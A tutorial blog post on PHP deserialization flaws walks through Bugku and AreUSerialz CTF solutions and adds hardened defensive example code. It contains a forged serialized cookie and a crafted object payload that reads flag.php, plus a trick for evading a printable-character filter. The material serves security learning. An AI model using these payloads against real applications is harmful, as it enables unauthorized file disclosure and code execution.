PHP deserialization & Java (1)

1. Key points

1. Principle

Serialization converts an object into a string; deserialization is the reverse, turning that string back into the original data. Serializing an object makes it easy to store and transmit, and lets multiple files share the same object.

2. Technology

(1) With a class: the file contains a class whose magic methods get triggered

(2) Without a class

3. Usage

Real-world applications, and CTF competitions

4. Harm

SQL injection, code execution, directory traversal, etc.

2. PHP deserialization

Principle: the serialized string supplied by the user is not checked, so an attacker can control the deserialization process, with uncontrollable consequences such as code execution, SQL injection and directory traversal. Certain magic methods are triggered automatically during serialization, and deserialization can likewise trigger some magic methods of the object.

serialize()    // converts an object into a string
unserialize()    // restores a string into an object

Trigger conditions: the argument passed to unserialize() is controllable, a usable class exists in the file, and that class has magic methods

Case 1: PHP deserialization without a class (local test)

The check uses unserialize(), so we build the input with its inverse, serialize(). Note that === in PHP is strict comparison: the data type and the value must both be the same.

<?php
$key = 'abcd';
echo serialize($key);
?>

The code execution result is:    s:4:"abcd";

Submitting this string in the URL request completes the check.

If the value is an integer, the result is as follows; just change the value in the URL to this execution result.

<?php
$key = 123;
echo serialize($key);
?>

// execution result:    i:123;

Case 2: Bugku range -- Challenge: No response after clicking login

Clicking login does nothing, so we inspect the page source and find admin.css; open it.


It contains the hint try?5491. Appending it to the URL makes the following code appear, which we analyse:

<?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");          // defines $flag
$cookie = $_COOKIE['BUGKU'];
if(isset($_GET['5491'])){
    show_source(__FILE__);         // ?5491 in the URL prints this source and stops
}
elseif (unserialize($cookie) === "$KEY")
{
    echo "$flag";                  // strict comparison: type and value must match
}
else {
?>
<!-- the else branch renders the login page; its HTML is not shown in the post -->
<?php
}

Idea: we can construct a serialized BUGKU cookie that unserializes to a value equal to KEY, which yields the flag, so we construct the serialization.


From the analysis, we can try constructing:

Cookie: BUGKU=s:13:"ctf.bugku.com";

Capture the request in Burp, modify the cookie value, then forward the request.

if(isset($_GET['5491'])){
    show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{
    echo "$flag";
}

Note from the analysis: if the 5491 parameter is present, the page displays the source and the key is never compared. So do not include ?5491 in the URL when capturing the packet; go back to the original address, capture that request, and modify the cookie.
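To make the trigger conditions concrete, here is an added example (not code from the original post or from the Bugku challenge) that puts the Case 2 check next to a hardened version. The key value, the AuditProbe class and the cookie strings are constructed for this example:

```php
<?php
// Added example (not code from the original post): the classless check of Cases 1 and 2,
// first as the challenge writes it, then hardened. KEY, AuditProbe and the cookies are
// constructed for this example.

const KEY = 'ctf.bugku.com';

// A class that happens to exist in the same file, as in Case 3. If unserialize() ever
// builds an object of it, __wakeup() runs, which is exactly the trigger the post describes.
class AuditProbe
{
    public static int $wakeups = 0;

    public function __wakeup(): void
    {
        self::$wakeups++;
    }
}

// Challenge-style check: the cookie is deserialized as-is. The @ mirrors the
// challenge's error_reporting(0); === is strict, so type and value must both match.
function challengeCheck(string $cookie): bool
{
    return @unserialize($cookie) === KEY;
}

// Hardened check: the expected value is a plain string, so no class may be
// instantiated from the cookie. allowed_classes => false makes unserialize() return
// __PHP_Incomplete_Class for any object instead of calling its magic methods, the
// type is verified before comparing, and hash_equals() avoids a timing side channel.
function hardenedCheck(string $cookie): bool
{
    $value = @unserialize($cookie, ['allowed_classes' => false]);
    return is_string($value) && hash_equals(KEY, $value);
}

// Build inputs the way the post does: serialize() is the inverse of unserialize().
$cookies = [
    'string form'  => serialize(KEY),            // s:13:"ctf.bugku.com";
    'integer form' => serialize(123),            // i:123;  wrong type, === fails
    'bad length'   => 's:12:"ctf.bugku.com";',   // malformed, unserialize() returns false
    'object form'  => 'O:10:"AuditProbe":0:{}',  // an object instead of the string
];

foreach ($cookies as $label => $cookie) {
    $before = AuditProbe::$wakeups;
    $c = challengeCheck($cookie);
    $challengeWoke = AuditProbe::$wakeups - $before;

    $before = AuditProbe::$wakeups;
    $h = hardenedCheck($cookie);
    $hardenedWoke = AuditProbe::$wakeups - $before;

    printf("%-13s challenge=%-5s (__wakeup x%d)   hardened=%-5s (__wakeup x%d)\n",
        $label, var_export($c, true), $challengeWoke, var_export($h, true), $hardenedWoke);
}
```

Run it with PHP 7.4 or later. Only the string form passes either check; the object form fires AuditProbe::__wakeup() once under challengeCheck() and never under hardenedCheck(). That is the whole difference between the two: the challenge lets unserialize() instantiate whatever class the cookie names, while the hardened version forbids any object and verifies the type before comparing.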

Case 3: PHP deserialization with a class

Example: creating an object automatically calls the __construct() function; the other magic methods fire on the events listed here:

__wakeup() // when unserialize() is executed, this function is called first
__sleep() // when serialize() is executed, this function is called first
__construct() // triggered when an object is created
__destruct() // triggered when an object is destroyed
__call() // triggered when an inaccessible method is called in object context
__callStatic() // triggered when an inaccessible method is called in static context
__get() // called when reading data from an inaccessible property, or when the key does not exist
__set() // used to write data to an inaccessible property
__isset() // triggered when isset() or empty() is called on an inaccessible property
__unset() // triggered when unset() is used on an inaccessible property
__toString() // triggered when the class is used as a string
__invoke() // triggered when trying to call the object as a function
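The list above says when each method fires; the following added example (not from the original post) shows the order in which PHP actually calls them around serialize() and unserialize(), and uses __wakeup() to re-validate state, since the constructor is skipped on deserialization. The Session class and its values are constructed for this example:

```php
<?php
// Added example (not from the original post): a class that records which magic methods
// PHP calls, and in which order, around serialize() and unserialize(). The Session class
// and its fields are constructed for this example.

class Session
{
    public static array $trace = [];        // records every magic-method call
    public string $user;
    public int $expires;
    private $handle;                        // runtime-only resource, must not be serialized

    public function __construct(string $user, int $expires)
    {
        self::$trace[] = '__construct';
        $this->user    = $user;
        $this->expires = $expires;
        $this->handle  = fopen('php://memory', 'r+');
    }

    // Runs at the start of serialize(): return only the properties worth storing.
    public function __sleep(): array
    {
        self::$trace[] = '__sleep';
        return ['user', 'expires'];
    }

    // Runs at the end of unserialize(). __construct() is NOT called on this path, so
    // anything the constructor validated must be re-checked here; rejecting bad state in
    // __wakeup() is the defensive side of the same trigger the post describes.
    public function __wakeup(): void
    {
        self::$trace[] = '__wakeup';
        if ($this->user === '' || $this->expires < 0) {
            throw new UnexpectedValueException('invalid serialized Session');
        }
        $this->handle = fopen('php://memory', 'r+');
    }

    public function __toString(): string
    {
        self::$trace[] = '__toString';
        return "{$this->user}@{$this->expires}";
    }

    public function __destruct()
    {
        self::$trace[] = '__destruct';
        if (is_resource($this->handle)) {
            fclose($this->handle);
        }
    }
}

// Round trip through serialize() and unserialize(), then use and destroy both objects.
$original = new Session('alice', 3600);
$blob     = serialize($original);           // calls __sleep()
$copy     = unserialize($blob);             // calls __wakeup(), never __construct()
echo "$copy\n";                             // calls __toString()
unset($original, $copy);                    // calls __destruct() for each object

echo implode(' -> ', Session::$trace), "\n";

// A tampered blob still reaches __wakeup(), which is where the validation fires.
Session::$trace = [];
try {
    unserialize('O:7:"Session":2:{s:4:"user";s:0:"";s:7:"expires";i:-1;}');
} catch (UnexpectedValueException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

Running it prints the trace `__construct -> __sleep -> __wakeup -> __toString -> __destruct -> __destruct`: __sleep() decides what is stored, __wakeup() is the first code that runs on the restored object, and __destruct() runs once per object. The second unserialize() call never passes through __construct(), so the check in __wakeup() is the only place the bad values can be rejected.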

CTFHub range -- Challenge: AreUSerialz

Only the solution is given here; for the details see the write-up: buuctf beginners' learning record -- [Net Tripod Cup 2020 Qinglong Group] AreUSerialz, pakho_C's blog on CSDN

Analyze the source code and write out the solution:


O:10:"FileHander":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}

Serializing a protected property produces unprintable characters: the property name is prefixed with %00*%00, and %00 has ASCII code 0, so the string cannot pass the is_valid() check above. Because the %00 byte is not displayed, the only visible difference is an extra * in front of the variable name.

Private properties also produce unprintable characters when serialized. From PHP 7.1 onward, unserialize() is not sensitive to the property visibility, so we can change the protected form to the public form to eliminate the unprintable characters.

payload:

?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}

This challenge mainly practises the with-class case of PHP deserialization, and covers knowledge points such as magic methods and PHP weak-type comparison.
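As an added example (not from the original post or the challenge), the following shows how serialize() encodes the three visibilities, that the protected form fails a printable-byte filter of the kind is_valid() applies, and that PHP 7.1+ fills the protected properties from the public form anyway. FileHandler here is a stand-in with the challenge's property names and no file access; isPrintable() is an assumed shape of the challenge's is_valid():

```php
<?php
// Added example (not code from the original post or the challenge): how serialize()
// encodes property visibility, why the protected form fails a printable-byte filter,
// and that unserialize() on PHP 7.1+ fills protected properties from the public form.
// FileHandler is a constructed stand-in: same property names as the challenge, but it
// never touches the filesystem. isPrintable() is an assumed form of the challenge's is_valid().

class FileHandler
{
    protected $op;
    protected $filename;
    protected $content;

    public function state(): array
    {
        return ['op' => $this->op, 'filename' => $this->filename, 'content' => $this->content];
    }
}

class Holder
{
    private $secret = 1;       // private, for comparison with protected
}

// Make the \0 bytes visible; on screen they are invisible, which is why the protected
// name seems to just have an extra * in front of it.
function showNulls(string $s): string
{
    return str_replace("\0", '\0', $s);
}

// Printable-ASCII filter of the kind the post's is_valid() applies (assumed: every byte
// must be 0x20..0x7E). A \0 byte has ASCII code 0, so it fails.
function isPrintable(string $s): bool
{
    return preg_match('/^[\x20-\x7E]*$/', $s) === 1;
}

$protectedForm = serialize(new FileHandler());     // names become \0*\0op, \0*\0filename, ...
$privateForm   = serialize(new Holder());          // name becomes \0Holder\0secret
$publicForm    = 'O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}';

foreach (['protected' => $protectedForm, 'private' => $privateForm, 'public' => $publicForm] as $kind => $s) {
    printf("%-9s printable=%-5s %s\n", $kind, var_export(isPrintable($s), true), showNulls($s));
}

// PHP 7.1+ does not require the visibility marker to match: the public-form string
// still populates the protected properties of the real class.
$obj = unserialize($publicForm);
var_export($obj->state());
echo "\n";
```

The takeaway for the defending side is that filtering characters in a serialized string does not prevent object instantiation: the public form is entirely printable and still populates the protected properties. The control has to sit at the call site, by not passing user input to unserialize() at all or by rejecting every class with allowed_classes, rather than in a byte filter.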


Source: blog.csdn.net/weixin_52221158/article/details/126343828